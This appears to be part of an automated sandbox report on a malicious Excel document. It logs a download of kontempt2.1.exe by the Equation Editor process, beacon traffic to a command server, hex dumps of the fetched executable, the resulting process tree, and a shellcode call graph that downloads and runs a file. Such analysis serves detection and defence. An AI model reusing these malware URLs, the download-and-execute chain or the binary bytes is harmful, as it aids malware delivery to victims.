                                                                          Data Ascii: 2PV85pl=uCBloOSADXua3d44cERhEI8Opikl8M9Cv/o4hqFv+0SQeQKI/1e+IGUnA/5Wo20UibyJGMOlcWq6PmJh2WbUXKGrQPS3draB0kR3y0L6ehVIyOwTVifC/YI7K9eRF1XpJWwpvF889thrW38T+TcqAeWx1TY+DWrHOm4FNJiFJJpiSOFkUUJD7Q3gQLfb+QBpI0pSAW07Pf3P8q5NmPdlSyXsfJNg8/KJ7OIifG6WQ/0HlfpaN9hRVmyGSdMBRwv6LkGxP/LKdiTzdYjKyiYQMQkZjRrTSuSJb7bOWPSlUAFNnVHX5FHRjc5NcBz5LtuE7YRQvtUq92k+rN4a7cXjgmPTywPOiHGvxa92/IgYckFgL6soSscKIBn+GZjQP8tqDwbH5ZGPmAVjxHFO1ulUg+5KBsROckXtD00IRF8wFzsgFj3fUsLaLVscfTyGCM/7oSO101aanhfPGsEC0yEOjn8evSHDBXRX/szzXUz+IKQ5Bs1I3V9zg7hT7wqeutEhBnTSPN81ujCV5FIPEAsNFiQR59QfSp3YKHjtwN8Dmtx3jyi2UdtK9QdmfIafHlKMitOMzeBt9wL/L2Zx0rIncVV7UMfNsap0NoaxO7Me3LLRtRUsP0rry/iLoimdtBqtLWBMPfj7PRWK4867+L1ETxP4uub2jObaeWa350/dDjK8iA6NxalsoYQzgs06n759e4CnEcv4u+SEZqVsunt2GbF5ZzQqFTvIZh28UF0iKX4w4KvNi6XSpe9WwK3Mm96UFv3wMINX43Xx9Tdn1X4wExp/e7ovF0aS1MmovFcpWJo+x3MEiIrgtYpye87w/ih+l/9qbx8Ph2FiUumQ6J4ljQBfpmIsegZBsrf6/e3Y6l3sRTwMA9I8FvVl1A4NEpe7FvnY5H9BWbRnl6L4aGmkYc8sv2J74p71KUr77iABZWAU51muY9f0z2WgTnQ63lXCP6Qps+Mv5Rt8XZ+xp3pQvd9ABHSYSTCPC33kQmiUlmaB [TRUNCATED]
                                                                          Oct 22, 2024 15:02:22.332348108 CEST1627OUTData Raw: 65 42 6f 77 4a 35 66 79 6a 6e 48 42 37 6f 69 72 44 66 51 57 72 6f 72 79 62 30 52 4d 52 50 4b 4a 71 31 72 67 70 61 2b 72 58 5a 64 73 32 4f 57 41 30 37 78 4e 4c 76 51 4c 41 6b 32 4a 35 63 52 7a 2b 6b 2f 68 71 6a 56 69 6f 4e 71 77 53 78 37 5a 6e 4f
                                                                          Data Ascii: eBowJ5fyjnHB7oirDfQWroryb0RMRPKJq1rgpa+rXZds2OWA07xNLvQLAk2J5cRz+k/hqjVioNqwSx7ZnOAYiQ2EtKxM113ziBqUkGopHqS+a/BkUNspRVwUkJmvvBs1fzsVfzEGKR8JjFECzmNbaY/s9nL8aOu0GUL2Fu4XZGy8DGefuhChUD9vDZRP9pgQ29QDpo1CPwIlKl0L07yNkPIalmqFfumOXx3MAjaXeXtrpVl8pNa


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          14192.168.2.224917615.197.148.33801696C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Oct 22, 2024 15:02:24.866843939 CEST418OUTGET /to3j/?2PV85pl=jApFr+7+PXCxj/MoVVJ1BrMCoCw62P1GtIxP7MFIoy+IcxCptQTIZicQXM85kXEn8fuuasCKCCy3E0AKuRzTVtyVct6lEvO/8mUZ63PGcSN9z9MVRwPD85QlGJnP&DtMH=kxoTeT1hyx HTTP/1.1
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                          Accept-Language: en-US
                                                                          Connection: close
                                                                          Host: www.jilifish.win
                                                                          User-Agent: Opera/9.80 (Android 4.0.4; Linux; Opera Tablet/ADR-1411061201) Presto/2.11.355 Version/12.10
                                                                          Oct 22, 2024 15:02:25.498353958 CEST403INHTTP/1.1 200 OK
                                                                          Server: openresty
                                                                          Date: Tue, 22 Oct 2024 13:02:25 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 263
                                                                          Connection: close
                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 32 50 56 38 35 70 6c 3d 6a 41 70 46 72 2b 37 2b 50 58 43 78 6a 2f 4d 6f 56 56 4a 31 42 72 4d 43 6f 43 77 36 32 50 31 47 74 49 78 50 37 4d 46 49 6f 79 2b 49 63 78 43 70 74 51 54 49 5a 69 63 51 58 4d 38 35 6b 58 45 6e 38 66 75 75 61 73 43 4b 43 43 79 33 45 30 41 4b 75 52 7a 54 56 74 79 56 63 74 36 6c 45 76 4f 2f 38 6d 55 5a 36 33 50 47 63 53 4e 39 7a 39 4d 56 52 77 50 44 38 35 51 6c 47 4a 6e 50 26 44 74 4d 48 3d 6b 78 6f 54 65 54 31 68 79 78 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                          Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?2PV85pl=jApFr+7+PXCxj/MoVVJ1BrMCoCw62P1GtIxP7MFIoy+IcxCptQTIZicQXM85kXEn8fuuasCKCCy3E0AKuRzTVtyVct6lEvO/8mUZ63PGcSN9z9MVRwPD85QlGJnP&DtMH=kxoTeT1hyx"}</script></head></html>


                                                                          HTTPS Proxied Packets

                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          0192.168.2.2249162192.3.255.1454433448C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-10-22 13:00:48 UTC317OUTGET /kontempt2.1.exe HTTP/1.1
                                                                          Accept: */*
                                                                          Accept-Encoding: gzip, deflate
                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                          Connection: Keep-Alive
                                                                          Host: timurtrading.my
                                                                          2024-10-22 13:00:48 UTC275INHTTP/1.1 200 OK
                                                                          Server: nginx
                                                                          Date: Tue, 22 Oct 2024 13:00:48 GMT
                                                                          Content-Type: application/x-msdos-program
                                                                          Content-Length: 1320269
                                                                          Last-Modified: Tue, 22 Oct 2024 11:30:02 GMT
                                                                          Connection: close
                                                                          ETag: "67178cba-14254d"
                                                                          X-Powered-By: PleskLin
                                                                          Accept-Ranges: bytes
                                                                          2024-10-22 13:00:48 UTC16109INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 2d 82 c1 ed 69 e3 af be 69 e3 af be 69 e3 af be d4 ac 39 be 6b e3 af be 60 9b 3a be 77 e3 af be 60 9b 2c be db e3 af be 60 9b 2b be 50 e3 af be 4e 25 c2 be 63 e3 af be 4e 25 d4 be 48 e3 af be 69 e3 ae be 64 e1 af be 60 9b 20 be 2f e3 af be 77 b1 3a be 6b e3 af be 77 b1 3b be 68 e3 af be 69 e3 38 be 68 e3 af be 60 9b 3e be 68 e3 af be 52 69 63 68 69 e3 af be 00 00 00 00 00 00 00
                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$-iii9k`:w`,`+PN%cN%Hid` /w:kw;hi8h`>hRichi
                                                                          2024-10-22 13:00:48 UTC16384INData Raw: 89 3d c4 32 49 00 89 2d c8 32 49 00 89 2d cc 32 49 00 c7 05 d4 32 49 00 6c 9e 48 00 89 15 e4 32 49 00 89 3d e8 32 49 00 a3 ec 32 49 00 a3 f0 32 49 00 c7 05 f8 32 49 00 64 9e 48 00 89 15 08 33 49 00 89 3d 0c 33 49 00 a3 10 33 49 00 a3 14 33 49 00 c7 05 1c 33 49 00 58 9e 48 00 89 15 2c 33 49 00 89 3d 30 33 49 00 a3 34 33 49 00 a3 38 33 49 00 c7 05 40 33 49 00 48 9e 48 00 89 15 50 33 49 00 89 3d 54 33 49 00 89 15 58 33 49 00 89 15 5c 33 49 00 c7 05 64 33 49 00 38 9e 48 00 89 15 74 33 49 00 89 3d 78 33 49 00 a3 7c 33 49 00 a3 80 33 49 00 c7 05 88 33 49 00 20 9e 48 00 89 35 94 33 49 00 89 15 98 33 49 00 89 3d 9c 33 49 00 89 15 a0 33 49 00 89 2d a4 33 49 00 bb 36 94 47 00 89 1d 48 34 49 00 33 db 89 1d 4c 34 49 00 89 1d 50 34 49 00 bb 78 94 47 00 89 1d 6c 34 49
                                                                          Data Ascii: =2I-2I-2I2IlH2I=2I2I2I2IdH3I=3I3I3I3IXH,3I=03I43I83I@3IHHP3I=T3IX3I\3Id3I8Ht3I=x3I|3I3I3I H53I3I=3I3I-3I6GH4I3L4IP4IxGl4I
                                                                          2024-10-22 13:00:48 UTC16384INData Raw: 62 49 00 89 15 9c 62 49 00 c7 05 a4 62 49 00 14 7b 48 00 89 15 b8 62 49 00 a3 bc 62 49 00 a3 c0 62 49 00 c7 05 c8 62 49 00 fc 7a 48 00 89 15 dc 62 49 00 a3 e0 62 49 00 c7 05 e4 62 49 00 02 00 00 00 c7 05 ec 62 49 00 e8 7a 48 00 89 15 00 63 49 00 a3 04 63 49 00 c7 05 08 63 49 00 02 00 00 00 c7 05 10 63 49 00 d4 7a 48 00 89 15 24 63 49 00 a3 28 63 49 00 c7 05 2c 63 49 00 02 00 00 00 c7 05 34 63 49 00 c0 7a 48 00 89 15 48 63 49 00 a3 4c 63 49 00 c7 05 50 63 49 00 02 00 00 00 c7 05 58 63 49 00 ac 7a 48 00 89 15 6c 63 49 00 a3 70 63 49 00 89 35 74 63 49 00 c7 05 7c 63 49 00 8c 7a 48 00 89 3d 88 63 49 00 33 ff 89 3d 8c 63 49 00 bf b8 75 47 00 89 3d ac 63 49 00 33 ff 89 3d b0 63 49 00 bf c8 74 47 00 89 3d d0 63 49 00 33 ff 89 3d d4 63 49 00 bf 59 74 47 00 89 3d
                                                                          Data Ascii: bIbIbI{HbIbIbIbIzHbIbIbIbIzHcIcIcIcIzH$cI(cI,cI4cIzHHcILcIPcIXcIzHlcIpcI5tcI|cIzH=cI3=cIuG=cI3=cItG=cI3=cIYtG=
                                                                          2024-10-22 13:00:48 UTC16384INData Raw: 7a ff ff 8d 44 24 10 89 1d a8 83 4a 00 89 3d b0 83 4a 00 89 1d b4 83 4a 00 e8 c5 3d 00 00 8b 15 20 7f 4a 00 8b 5a 04 81 c3 24 7f 4a 00 e8 01 19 00 00 8d 74 24 30 e8 98 c7 ff ff 8d 74 24 10 e8 8f c7 ff ff 33 db 6a f6 88 1d 1c 80 4a 00 89 1d 18 80 4a 00 89 1d 0c 80 4a 00 89 1d 10 80 4a 00 89 1d 08 80 4a 00 89 1d 14 80 4a 00 89 1d 68 80 4a 00 88 1d 84 83 4a 00 88 1d 85 83 4a 00 88 1d a0 83 4a 00 89 1d 74 83 4a 00 ff 15 2c 22 48 00 3b c3 0f 85 e1 01 02 00 89 1d 94 83 4a 00 89 3d 20 80 4a 00 89 3d 24 80 4a 00 89 3d 28 80 4a 00 89 3d f4 81 4a 00 89 3d f8 81 4a 00 b8 0a 00 00 00 5f b9 fa 00 00 00 5e 88 1d 1d 80 4a 00 88 1d 1e 80 4a 00 88 1d 1f 80 4a 00 88 1d 38 80 4a 00 88 1d fc 81 4a 00 88 1d fd 81 4a 00 a3 2c 80 4a 00 a3 30 80 4a 00 c7 05 98 83 4a 00 64 00 00
                                                                          Data Ascii: zD$J=JJ= JZ$Jt$0t$3jJJJJJJhJJJJtJ,"H;J= J=$J=(J=J=J_^JJJ8JJJ,J0JJd
                                                                          2024-10-22 13:00:48 UTC16384INData Raw: 0f 87 ef ae 01 00 8b 4e 04 51 c7 46 08 00 00 00 00 e8 ec 07 00 00 83 c4 04 5e c3 8b c1 33 c9 c7 00 30 76 48 00 89 48 04 89 48 08 89 48 0c c3 cc cc cc cc 57 8b f8 83 ef 01 78 15 55 8b 6c 24 0c 56 8b f1 8b ce ff d3 03 f5 83 ef 01 79 f5 5e 5d 5f c2 04 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc a1 d0 83 4a 00 85 c0 0f 85 42 8b 01 00 c3 cc cc 33 c0 a3 cc 7c 4a 00 a3 d0 7c 4a 00 a3 d4 7c 4a 00 a3 d8 7c 4a 00 a3 dc 7c 4a 00 a3 e0 7c 4a 00 a2 e4 7c 4a 00 a2 e5 7c 4a 00 b8 cc 7c 4a 00 c3 b8 2c 06 02 00 e8 76 46 01 00 8b 84 24 30 06 02 00 53 33 db 68 00 04 00 00 88 1d 80 8e 4a 00 88 1d 81 8e 4a 00 88 1d 82 8e 4a 00 88 1d 83 8e 4a 00 a3 84 8e 4a 00 89 1d 88 8e 4a 00 89 1d 8c 8e 4a 00 89 1d 90 8e 4a 00 89 1d 94 8e 4a 00 c7 05 98 8e 4a 00 38 52 48 00 89 1d 9c 8e
                                                                          Data Ascii: NQF^30vHHHHWxUl$Vy^]_JB3|J|J|J|J|J|J|J|J|J,vF$0S3hJJJJJJJJJJ8RH
                                                                          2024-10-22 13:00:48 UTC16384INData Raw: c0 0f b7 45 08 74 04 0f b7 45 fc 38 5d f8 74 07 8b 4d f4 83 61 70 fd 5b c9 c3 8b ff 55 8b ec 6a 00 ff 75 08 e8 3c ff ff ff 59 59 5d c3 8b ff 55 8b ec 83 ec 18 53 56 ff 75 0c 8d 4d e8 e8 09 c9 ff ff 8b 5d 08 be 00 01 00 00 3b de 73 54 8b 4d e8 83 b9 ac 00 00 00 01 7e 14 8d 45 e8 50 6a 01 53 e8 0e 5f 00 00 8b 4d e8 83 c4 0c eb 0d 8b 81 c8 00 00 00 0f b7 04 58 83 e0 01 85 c0 74 0f 8b 81 cc 00 00 00 0f b6 04 18 e9 a3 00 00 00 80 7d f4 00 74 07 8b 45 f0 83 60 70 fd 8b c3 e9 9c 00 00 00 8b 45 e8 83 b8 ac 00 00 00 01 7e 31 89 5d 08 c1 7d 08 08 8d 45 e8 50 8b 45 08 25 ff 00 00 00 50 e8 9e e8 ff ff 59 59 85 c0 74 12 8a 45 08 6a 02 88 45 fc 88 5d fd c6 45 fe 00 59 eb 15 e8 52 33 00 00 c7 00 2a 00 00 00 33 c9 88 5d fc c6 45 fd 00 41 8b 45 e8 6a 01 ff 70 04 8d 55 f8
                                                                          Data Ascii: EtE8]tMap[Uju<YY]USVuM];sTM~EPjS_MXt}tE`pE~1]}EPE%PYYtEjE]EYR3*3]EAEjpU
                                                                          2024-10-22 13:00:48 UTC16384INData Raw: 8b 4d f4 f3 aa 8b 45 08 eb 2e f7 df 83 c7 10 89 7d f0 33 c0 8b 7d 08 8b 4d f0 f3 aa 8b 45 f0 8b 4d 08 8b 55 10 03 c8 2b d0 52 6a 00 51 e8 7e ff ff ff 83 c4 0c 8b 45 08 8b 7d fc 8b e5 5d c3 cc cc cc cc 56 8b 44 24 14 0b c0 75 28 8b 4c 24 10 8b 44 24 0c 33 d2 f7 f1 8b d8 8b 44 24 08 f7 f1 8b f0 8b c3 f7 64 24 10 8b c8 8b c6 f7 64 24 10 03 d1 eb 47 8b c8 8b 5c 24 10 8b 54 24 0c 8b 44 24 08 d1 e9 d1 db d1 ea d1 d8 0b c9 75 f4 f7 f3 8b f0 f7 64 24 14 8b c8 8b 44 24 10 f7 e6 03 d1 72 0e 3b 54 24 0c 77 08 72 0f 3b 44 24 08 76 09 4e 2b 44 24 10 1b 54 24 14 33 db 2b 44 24 08 1b 54 24 0c f7 da f7 d8 83 da 00 8b ca 8b d3 8b d9 8b c8 8b c6 5e c2 10 00 8b ff 55 8b ec 83 ec 18 53 57 ff 75 08 8d 4d e8 e8 5e 88 ff ff 8b 45 10 8b 7d 0c 33 db 3b c3 74 02 89 38 3b fb 75 2b
                                                                          Data Ascii: ME.}3}MEMU+RjQ~E}]VD$u(L$D$3D$d$d$G\$T$D$ud$D$r;T$wr;D$vN+D$T$3+D$T$^USWuM^E}3;t8;u+
                                                                          2024-10-22 13:00:48 UTC16384INData Raw: 2b c2 d1 f8 c7 85 c8 fd ff ff 01 00 00 00 e9 f0 03 00 00 89 b5 c8 fd ff ff e9 e5 03 00 00 a1 40 0d 49 00 89 85 e4 fd ff ff 50 e8 c4 6c ff ff 59 e9 ce 03 00 00 83 f8 70 0f 8f fb 01 00 00 0f 84 e3 01 00 00 83 f8 65 0f 8c bc 03 00 00 83 f8 67 0f 8e 34 fe ff ff 83 f8 69 74 71 83 f8 6e 74 28 83 f8 6f 0f 85 a0 03 00 00 f6 85 f0 fd ff ff 80 c7 85 e0 fd ff ff 08 00 00 00 74 61 81 8d f0 fd ff ff 00 02 00 00 eb 55 8b 37 83 c7 04 89 bd dc fd ff ff e8 af 6c 00 00 85 c0 0f 84 2f fa ff ff f6 85 f0 fd ff ff 20 74 0c 66 8b 85 d8 fd ff ff 66 89 06 eb 08 8b 85 d8 fd ff ff 89 06 c7 85 c0 fd ff ff 01 00 00 00 e9 a6 04 00 00 83 8d f0 fd ff ff 40 c7 85 e0 fd ff ff 0a 00 00 00 8b 8d f0 fd ff ff f7 c1 00 80 00 00 0f 84 a9 01 00 00 8b 07 8b 57 04 83 c7 08 e9 d5 01 00 00 75 11 80
                                                                          Data Ascii: +@IPlYpeg4itqnt(otaU7l/ tff@Wu
                                                                          2024-10-22 13:00:48 UTC16384INData Raw: 09 00 00 00 8b 45 e4 e8 d8 66 ff ff c3 6a 06 e8 2c 78 ff ff 59 c3 8b ff 55 8b ec 83 ec 10 56 8b 75 08 57 33 ff 89 7d fc 3b f7 75 1e e8 05 74 ff ff 6a 16 5e 57 57 57 57 57 89 30 e8 8e 73 ff ff 83 c4 14 8b c6 e9 0b 02 00 00 6a 24 68 ff 00 00 00 56 e8 ac 26 ff ff 8b 45 0c 83 c4 0c 3b c7 74 cb 8b 08 8b 40 04 83 f8 ff 89 4d f0 89 45 f4 7f 16 7c 08 81 f9 40 57 ff ff 73 0c e8 b6 73 ff ff 6a 16 5e 89 30 eb bc 83 f8 07 7c 0a 7f ed 81 f9 cf 26 41 93 77 e5 53 57 68 80 33 e1 01 50 51 e8 7f 02 00 00 8b c8 83 c1 46 8d 81 2b 01 00 00 99 bb 90 01 00 00 f7 fb 8d 79 ff 6a 64 89 7d f8 89 4d 08 8b d8 8b c7 99 5f f7 ff 6a ff 68 93 fe ff ff 2b d8 8b 45 f8 99 83 e2 03 03 c2 c1 f8 02 8d 44 03 ef 99 8b f8 8d 41 ba 8b da 99 52 50 e8 10 28 00 00 2b c7 1b d3 6a 00 bb 80 51 01 00 53
                                                                          Data Ascii: Efj,xYUVuW3};utj^WWWWW0sj$hV&E;t@ME|@Wssj^0|&AwSWh3PQF+yjd}M_jh+EDARP(+jQS
                                                                          2024-10-22 13:00:48 UTC16384INData Raw: 2d 46 f7 d8 13 d3 f7 da 3b d3 8b fe c6 06 30 7c 24 b9 e8 03 00 00 7f 04 3b c1 72 19 53 51 52 50 e8 9e 1e 00 00 04 30 88 06 46 89 55 f0 8b c1 8b d3 3b f7 75 0b 85 d2 7c 1e 7f 05 83 f8 64 72 17 6a 00 6a 64 52 50 e8 78 1e 00 00 04 30 88 06 89 55 f0 46 8b c1 8b d3 3b f7 75 0b 85 d2 7c 1f 7f 05 83 f8 0a 72 18 6a 00 6a 0a 52 50 e8 52 1e 00 00 04 30 88 06 89 55 f0 46 8b c1 89 5d f0 04 30 88 06 c6 46 01 00 80 7d e8 00 74 07 8b 45 e4 83 60 70 fd 33 c0 5b 5f 5e c9 c3 8b ff 55 8b ec 83 ec 10 53 56 57 ff 75 14 8b d8 8b 73 04 8b f9 8d 4d f0 4e e8 93 c8 fe ff 85 ff 75 2d e8 75 33 ff ff 6a 16 5e 89 30 33 c0 50 50 50 50 50 e8 fc 32 ff ff 83 c4 14 80 7d fc 00 74 07 8b 45 f8 83 60 70 fd 8b c6 e9 a3 00 00 00 83 7d 08 00 76 cd 80 7d 10 00 74 18 3b 75 0c 75 13 33 c0 83 3b 2d
                                                                          Data Ascii: -F;0|$;rSQRP0FU;u|drjjdRPx0UF;u|rjjRPR0UF]0F}tE`p3[_^USVWusMNu-u3j^03PPPPP2}tE`p}v}t;uu3;-


                                                                          Statistics

                                                                          CPU Usage

                                                                          Click to jump to process

                                                                          Memory Usage

                                                                          Click to jump to process

                                                                          High Level Behavior Distribution

                                                                          Click to dive into process behavior distribution

                                                                          Behavior

                                                                          Click to jump to process

                                                                          System Behavior

                                                                          General

                                                                          Target ID:0
                                                                          Start time:09:00:22
                                                                          Start date:22/10/2024
                                                                          Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                                                          Imagebase:0x13ffa0000
                                                                          File size:28'253'536 bytes
                                                                          MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:false

                                                                          General

                                                                          Target ID:2
                                                                          Start time:09:00:42
                                                                          Start date:22/10/2024
                                                                          Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                                          Imagebase:0x400000
                                                                          File size:543'304 bytes
                                                                          MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:5
                                                                          Start time:09:00:48
                                                                          Start date:22/10/2024
                                                                          Path:C:\Users\user\AppData\Roaming\word.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Users\user\AppData\Roaming\word.exe
                                                                          Imagebase:0x400000
                                                                          File size:1'320'269 bytes
                                                                          MD5 hash:A6BF416D4380AEA9DAF376E06878F0F7
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Antivirus matches:
                                                                          • Detection: 100%, Joe Sandbox ML
                                                                          Reputation:low
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:6
                                                                          Start time:09:00:49
                                                                          Start date:22/10/2024
                                                                          Path:C:\Windows\SysWOW64\svchost.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Users\user\AppData\Roaming\word.exe
                                                                          Imagebase:0xd40000
                                                                          File size:20'992 bytes
                                                                          MD5 hash:54A47F6B5E09A77E61649109C6A08866
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:moderate
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:7
                                                                          Start time:09:01:14
                                                                          Start date:22/10/2024
                                                                          Path:C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exe"
                                                                          Imagebase:0x8d0000
                                                                          File size:140'800 bytes
                                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:false

                                                                          General

                                                                          Target ID:8
                                                                          Start time:09:01:15
                                                                          Start date:22/10/2024
                                                                          Path:C:\Windows\SysWOW64\msinfo32.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Windows\SysWOW64\msinfo32.exe"
                                                                          Imagebase:0xc80000
                                                                          File size:303'104 bytes
                                                                          MD5 hash:5F2122888583347C9B81724CF169EFC6
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:low
                                                                          Has exited:false

                                                                          General

                                                                          Target ID:9
                                                                          Start time:09:01:27
                                                                          Start date:22/10/2024
                                                                          Path:C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exe"
                                                                          Imagebase:0x8d0000
                                                                          File size:140'800 bytes
                                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:false

                                                                          General

                                                                          Target ID:12
                                                                          Start time:09:01:42
                                                                          Start date:22/10/2024
                                                                          Path:C:\Program Files (x86)\Mozilla Firefox\firefox.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Program Files (x86)\Mozilla Firefox\Firefox.exe"
                                                                          Imagebase:0x1030000
                                                                          File size:517'064 bytes
                                                                          MD5 hash:C2D924CE9EA2EE3E7B7E6A7C476619CA
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:moderate
                                                                          Has exited:true

                                                                          Disassembly

                                                                          Reset < >

                                                                            Execution Graph

                                                                            Execution Coverage:21.1%
                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                            Signature Coverage:71%
                                                                            Total number of Nodes:31
                                                                            Total number of Limit Nodes:3
                                                                            execution_graph 164 36017d5 165 36017d8 164->165 168 360180d 165->168 169 360180f 168->169 172 3601822 LoadLibraryW 169->172 171 3601814 179 360183c 172->179 174 3601829 177 360184d 174->177 185 360189b URLDownloadToFileW 174->185 176 36018de 176->171 177->176 190 36018e6 177->190 180 360183f 179->180 181 360189b 4 API calls 180->181 182 360184d 180->182 181->182 183 36018de 182->183 184 36018e6 3 API calls 182->184 183->174 184->183 196 36018b8 185->196 187 36018de 187->177 188 36018a4 188->187 189 36018e6 3 API calls 188->189 189->187 191 36018e9 WinExec 190->191 200 3601906 191->200 194 3601941 194->176 195 3601909 ExitProcess 195->194 197 36018bb 196->197 198 36018e6 3 API calls 197->198 199 36018de 198->199 199->188 201 3601909 ExitProcess 200->201 202 36018fa 201->202 202->194 202->195 203 360190d GetPEB

                                                                            Callgraph

                                                                            • Executed
                                                                            • Not Executed
                                                                            • Opacity -> Relevance
                                                                            • Disassembly available
                                                                            callgraph 0 Function_03601822 1 Function_03601935 0->1 3 Function_036018E6 0->3 7 Function_0360189B 0->7 8 Function_0360183C 0->8 2 Function_036017D5 10 Function_0360180D 2->10 4 Function_03601906 3->4 5 Function_03601986 6 Function_036018B8 6->1 6->3 7->1 7->3 7->6 8->1 8->3 8->7 9 Function_0360190D 10->0

                                                                            Executed Functions

                                                                            Function 036018E6 Relevance: 3.0, APIs: 2, Instructions: 46processCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 0 36018e6-36018fd WinExec call 3601906 5 360194f 0->5 6 36018ff 0->6 7 3601951-3601955 5->7 8 3601957-360195b 5->8 9 3601970-3601972 6->9 10 3601901-360190b ExitProcess 6->10 7->8 11 3601963-360196a 7->11 8->9 12 360195d-3601961 8->12 13 3601982-3601983 9->13 19 3601941-3601944 10->19 15 360196c 11->15 16 360196e 11->16 12->9 12->11 15->9 17 3601974-360197d 16->17 17->19 20 3601946-3601949 19->20 21 360197f 19->21 20->17 22 360194b 20->22 21->13 22->5
                                                                            APIs
                                                                            • WinExec.KERNEL32(?,00000001,?,036018DE), ref: 036018F3
                                                                              • Part of subcall function 03601906: ExitProcess.KERNEL32(00000000,?,036018FA,?,036018DE), ref: 0360190B
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.427253488.0000000003540000.00000004.00000020.00020000.00000000.sdmp, Offset: 03540000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_3540000_EQNEDT32.jbxd
                                                                            Similarity
                                                                            • API ID: ExecExitProcess
                                                                            • String ID:
                                                                            • API String ID: 4112423671-0
                                                                            • Opcode ID: 7b4514c50c6803db6e1acb15a029f5a29cf7c6a0b93d7e4af60678115a653edc
